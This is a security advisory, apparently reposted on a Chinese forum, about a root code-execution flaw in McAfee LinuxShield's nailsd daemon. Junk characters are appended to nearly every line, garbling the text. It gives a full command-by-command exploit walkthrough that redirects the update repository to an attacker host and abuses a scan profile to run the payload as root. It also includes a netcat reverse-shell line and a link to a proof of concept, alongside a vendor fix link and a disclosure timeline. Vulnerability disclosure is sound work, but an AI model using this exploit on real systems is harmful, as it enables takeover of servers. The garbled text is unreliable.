    3 L! m, b2 U& |, uLinuxShield uses a web-browser interface, and a large number of
    8 ?$ \1 c9 u; C& e" [LinuxShield installations can be centrally controlled by ePolicy3 R6 G4 j/ S* ?( ?! i) H
    Orchestrator.* p/ \: G/ P+ E, v) |* x

    1 D1 T! b8 ~& s3 {- s(Product description from LinuxShield Product Guide)8 T7 O2 y1 b6 t: n! r

    : K8 O* |) I& R. R8 b
    ; l7 \. @; Q2 M0 G+ W5 k- V  o6 m5 j4 e" Z9 F$ w
    Description:+ C- \; w% Y' B2 D- R, C
    ============
    9 [$ |( d' Y" X% Z0 v- I% ?, r: T; x- [! f- Q+ J
    This vulnerability allows remote attackers to execute arbitrary code* }$ n) e) v# O. D$ |$ t, x5 D. }
    on vulnerable installations of McAfee LinuxShield. User interaction2 V" A. u9 j0 S; q# P5 B
    is not required to exploit this vulnerability but an attacker must( Z! [  H5 Y5 c, ^/ @
    be authenticated.
    ; M1 i' _, S" e! ]  T5 c
    # s6 q4 J4 [! F  r1 ]The LinuxShield Webinterface communicates with the localy installed
      r" F# u* ~$ x: D  b; E"nailsd" daemon, which listens on port 65443/tcp, to do
    ; u$ m) O, X" M+ m2 {configuration
    ) C) X1 v3 O- G" v( n, o3 _changes, query the configuration and execute tasks.$ {. {# i4 k1 i" a1 n* P1 C! |5 V" v
    / X& w1 @/ {+ d
    Each user, which can login to the victim box, can also authenticate
    ) t. b8 G* W. A# q  p9 Mit self to the "nailsd" and can do configuration changes and
    4 @2 j) _8 }9 Q' K( w& Gexecute
    " k1 w0 C- B3 a0 Y' \6 etasks with root privileges.
    " f7 j1 H2 }  f. y2 @* G/ b, R1 [4 v3 i$ A1 p$ W
    A direct execution of commands is not possible, but it is possible to
    / \( w8 D/ x  S. odownload and execute code through manipulation of the config and+ s$ `2 R& a8 u+ w/ L! a  R) K
    execute schedule tasks of the LinuxShield.: T( _3 u. t; X: a

    5 @5 ]  S  r+ k  t/ g/ H/ X) P( b
    * ]8 `0 m  P  j0 fwalk-through (after the TLS handshake):7 }! I8 G" y2 g" r* L" g
    +--------------------------------------8 Z6 d9 p$ i2 F* d9 D9 ^
    % F1 s& U6 Z& m& v6 D
    nailsd > +OK welcome to the NAILS Statistics Service
    ; D1 n8 n, D0 Y& E2 nattacker> auth <user> <pass>
    ( P0 i8 z, b) _2 J4 `9 \1 y2 ^  ^) V, unailsd > +OK successful authentication# V7 w# ^- w, z# {  \
    9 H- x  u3 @, P! y' u
    # Set the Attacker repository to download our code from a httpd
    - [: g2 e, Q7 z! k* X, T# z# (catalog.z)* c* `+ L9 s" [% v- y4 t
    #---------------------------------------------------------------
    ; V# }" i6 y1 [3 O3 g  @attacker> db set 1 _table=repository status=1 siteList=<?xml version. {: I% _" _2 h. V
    ="1.0" encoding="UTF-8"?><ns:SiteLists, R! Z4 @2 o* S- e
    xmlns:ns="naSiteLi
    6 S! N2 e6 |6 u6 r& D. Vst" GlobalVersion="20030131003110"0 Q8 s( ~2 t! H$ J
    LocalVersion="20091209/ a% j" F# R1 [/ s+ P' ^
    161903" Type="Client"><SiteList
    6 _; s! w2 N" o7 O8 y! ~2 qDefault="1" Name="SomeGU
      x; C4 n* L9 h) F/ p, vID"><HttpSite Type="repository"
    & {2 y+ |  X- P5 |8 f0 cName="EvilRepo" Order="14 }" T' F: v; E% r8 ~) U4 c
    " Server="<attackerhost>:80". |+ A  v; x7 V+ d5 n
    Enabled="1" Local="1"><Rela
    ! r4 J( q% J$ O2 W, m- d# z/ A2 b' O, c6 F& p" O
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    ( u/ S* O/ [7 o6 k/ t! zrName></
    % M* c6 H# L) E! Z+ l7 F) C& t  SUserName><Password
    : C# D3 m* U; W( d6 r! {Encrypted="0"/></HttpSite></SiteList></+ ^+ q7 q. _8 D+ `+ l6 Z& _- m9 ?
    ns:SiteLists> _cmd=update
    ! H! l  m$ n* h; L, t2 `nailsd > +OK database changes buffered.& l* P, b! d8 u% H0 n! G8 {
    " E  I9 \6 [; _! l
    # Execute task to set the attacker repository7 D% |# }1 \7 J: H% [7 ?( D; V
    #---------------------------------------------------------------
    ; k1 n! M% k4 _% c$ Aattacker> task setsitelist( p8 Q% @" ]3 }' ^
    nailsd > +OK setting sitelist from CMA.. X2 m4 O2 c: J' j+ Z1 u" O' H( o' }

    " W& @& V: i& `* A# |8 j, V$ r& T* O9 ?& P# Execute the default Update task to download the code% V9 Y2 C# [4 Q+ D
    #---------------------------------------------------------------! d* Q1 z/ a7 _9 J4 \9 ]0 h
    attacker> task nstart LinuxShield Update
    $ i; Y1 r4 q, ?; V" c/ pnailsd > +OK task LinuxShield Update starting
    7 y1 i% O4 O! {! k
    / }6 ?8 x. I* T7 o- B# Create a Scan profile, which executes our code. The profiles are  O6 R4 C7 h5 u* p
    # not stored in the database.
    # K2 ~* i% b) ^0 ~# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    2 `% X1 M8 x) ^, ?/ ~#---------------------------------------------------------------
    / G! D7 ~( A5 E' Qattacker> sconf ODS_99 begin' q4 L* \+ Y, D) J, L; R" e# L
    nailsd > +OK 1260400888' z; B& h2 n  Y1 h4 }6 A1 u4 w
    ; L8 }- f& r& C4 ]
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the) B+ {) \$ c7 @$ t2 j
    path1 X' E, f9 }& E, \6 }3 H0 K
    # where our earlier downloaded catalog.z file is stored.) [+ v) `- g0 J8 r
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    9 J0 c' i4 d$ E1 C6 \#---------------------------------------------------------------) O6 ?- f" ?. F7 o! |. J
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    4 S' y! J( d6 ]% E+ T& e  Gtrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O1 r6 I3 [7 `0 Z7 E
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    1 e! y' J) U9 F# F% r10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng% L7 }* e2 Q- J5 h' k
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    ( K" l7 ]+ ?( @. z7 O& C5 _file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD* _8 @1 G9 n6 ^2 k
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    " i) ]0 Q2 Y/ ]7 u1 P. pginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd" {/ ?4 @/ t3 S7 s" S8 ^
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu" O" \& I5 U9 n3 G
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru& t. I3 V) C2 v+ h5 V2 V
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_991 J% ^. A9 r0 Y2 c8 K
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi6 |+ i) R& _# I5 s
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    3 K& f$ J+ `; M8 w3 s. f. P0 y& y0 [dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin7 U- r1 e2 X0 W2 P9 c. X. K% T
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    8 i6 ?$ e* G0 G) P' E7 i1 o' ?: |ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm3 M2 \% t" C, N# @( o
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    / ?# e+ V  R& ]2 j9 L" Q.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t& A9 C: O6 s1 y7 q$ ^
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat7 b  e5 ~# g4 Y* J
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    - {7 @1 Y( d5 O6 @2 q00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    - N5 h9 S* Q4 ]2 o1 [7 LODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    # }/ J  ?8 e! a3 K( d0 C4 Iter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    2 j3 A; `2 x8 P! Q9 n+ `9 Znailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    , S) M" b* C* e" w' t1 Q" Yofile.ODS_99.filter.extensions.type=extension nailsd.profil- u( B+ I4 O& D
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    ! d6 ~9 G' r3 {2 T9 E4 X8 n.action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    ) M; [7 b" X9 v; v# ?action.App.primary=Clean nailsd.profile.ODS_99.action.App.s$ W* ?! \5 ]+ z2 N
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa/ ?6 X$ V, G# J% B- j/ R9 k
    ss nailsd.profile.ODS_99.action.error=Block
    & s7 e8 T% u! q/ A- k, N6 ynailsd > +OK configuration changes buffered% M1 I$ R; `& R% E
    attacker> sconf ODS_99 commit 1260400888
    & J# n6 A% y, Q$ H) p# Wnailsd > +OK configuration changes stored8 e( Q3 R+ l+ ^/ n  I% ]7 ]0 q

    ; x& z4 D; y1 U6 t7 V( ~# S# Set a scan task with the manipulated profile to execute the code
    : C$ h$ T5 D; O! T6 t#---------------------------------------------------------------% k3 ^' W& n  I0 n3 M
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy8 k- T5 f# H: w1 O
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    5 h# m& H" E" ~% P. W0 B6 o; Ymp;exclude:false timetable=type=unscheduled taskResults=0 i
    $ r6 V( c6 \: K1 Y: ^- C_lastRun=1260318482 status=Stopped _cmd=insert
    8 q$ N! L% ~, y+ Qnailsd > +OK database changes buffered
    7 G" S2 G+ y7 h* q7 D4 w7 S& W. n( V3 {" i# [) U& V! `. ?+ g: h5 z
    # Execute scan task to execute the code
    2 v3 o0 j7 J* |#---------------------------------------------------------------& Z% F% Y# j. h- v0 u1 f4 ^2 n; k
    attacker> task nstart Evil Task
    ' ?- p2 G0 U! z/ E4 U
    $ c9 j3 W* [, E+ \+-------------------------------------- walk-through EOF7 o2 Y& I/ z7 y. W7 Z. i0 J

    3 o- ^% A8 t/ R' E: W* T5 K
    : u- p# Z& ^6 z& i8 Q* y: X, P1 q$ eTo get a reverse root shell place something like this in the catalog.z) Z4 ]( j/ A! D7 a
    ; L4 o3 ^7 D- i# B7 m$ L, q
    --- snip ---
    ) o% c5 R: G9 w, o1 s( u#!/bin/sh
    / F+ f/ a, S5 `7 F% t7 a$ V/ ?. ^! C& gnc -nv <attacker_host> 4444 -e /bin/sh9 w2 ~5 g1 j- }6 R
    --- /snip ---
    1 g# f& S) B9 G2 d+ y/ ^9 t! f6 P; ?
    . r+ E$ d* I$ A3 P4 z
    9 D& f3 \2 @2 E: o
    Proof of Concept :
    ! b/ D7 a3 w, \0 y# r) @==================3 @; u8 D8 h7 V7 i0 l
    4 Y% k4 A: a! F! C: p4 ?( O
    http://inj3ct0r.com/sploits/11165.tar.gz% p0 ~9 `( m; k& P: r- w# X
    / ^) g4 G/ u! I+ Z' h6 ^9 F' f9 B
    1 K# M+ Q3 h3 v) d! ^: \
    # F3 ?0 G  r: J
    Solution:8 w6 o: R: a2 P5 {( W
    =========
    * M# U# D# \: a3 n( J1 E7 }2 I
    0 Y# h1 n( z+ U# D! {$ oMcAfee Advisory
    , x: R' r. ~$ d4 T6 w' ]6 w$ [+--------------6 O4 s& F& O; w
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    ' S4 ]5 {7 J* H7 g7 s% E- k) y  F& F& q7 V5 r4 ~# E

    : ]  I) c% S1 [+ N2 t/ A: X% K# L
    ; D1 b# V1 T8 \- P9 K. S1 g4 d6 hDisclosure Timeline (YYYY/MM/DD):
    % u7 {7 K6 j) a% ]=================================0 n% d3 ^9 }/ y: L- _3 X/ Y

    " k& D" ]7 f9 J  u3 B2009.12.07: Vulnerability found
    # e. z0 L6 M& W8 _4 a% f! x2010.02.03: Asked vendor for a PGP key0 K/ ?' L4 C/ l' b
    2010.02.05: Vendor sent his PGP key3 O% |+ P# k/ R5 W. `8 L
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    8 Z. t3 t0 L: }/ w" d& c# |1 z- S% Idate (2010.02.18) to Vendor
    + b4 m* y! c* {2010.02.05: Vendor acknowledges the reception of the advisory3 Q3 y( @  H7 I/ q2 r$ v) N
    2010.02.16: Ask for a status update, because the planned release date is
    - l& E) t, b: i) [3 K) |4 `. o# R2010.02.18.% H$ q; N+ e# c9 o
    2010.02.16: Vendor response that, they are currently working on a patch
    ; h0 r  c* J( M- Y/ D2 m$ B2010.02.17: Changed release date to 2010.02.25.
    $ p' F+ c. w+ [) z3 ^$ q* p2010.02.22: Vendor gives a status update, that they are able to release3 Q) Q4 u% X. r. F0 }; \% q
    the patch on 2010.02.25.
    ( N$ W9 \) R9 \% f3 L1 J/ J0 G# q2010.02.24: Ask for a list of affected products and the advisory url.
    ' w) T+ @1 q+ Q2010.02.24: Vendor sends the list.7 A, D. k; m. |
    2010.03.02: Release of this Advisory% x# A0 X, h( i" t- W
    ( t2 B- W3 e5 k6 ^3 z$ v
    9 A& k; s4 X0 u2 A: Q

    . B7 {4 k5 `6 r& ]$ _
    ) `4 G% C/ a+ P" a* D, T; s9 R! G0 U  \! K: d' u4 b

    , G$ A# {, S0 Z7 [) F8 o
    9 N0 q& b6 C# f  a) M% ~( M
    7 W; ]4 m$ S+ S! A5 ]
    ! g' c& G8 l& Z9 ^- R6 e) j+ N5 C% g+ O3 [( d

    3 o$ Q5 G; F( _; l9 u- p; [+ F. Y4 {: m1 K1 A) x; w/ F
    $ U7 S; H! ]- P  G6 z
    2 q, S3 U6 U- [" ^# q; Z

    7 `( ?6 v. R% n5 f- s
    4 ~3 F) E3 j. G2 V' b# e8 ]4 _3 z1 J8 L
    2 q; W) ~: l: M
    / L& y  f, e7 _% v& y4 h  _
    * W- i! p' f: Z, s
    3 s# C* e  r) E9 V
    2 S7 I! M, @! [  i公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表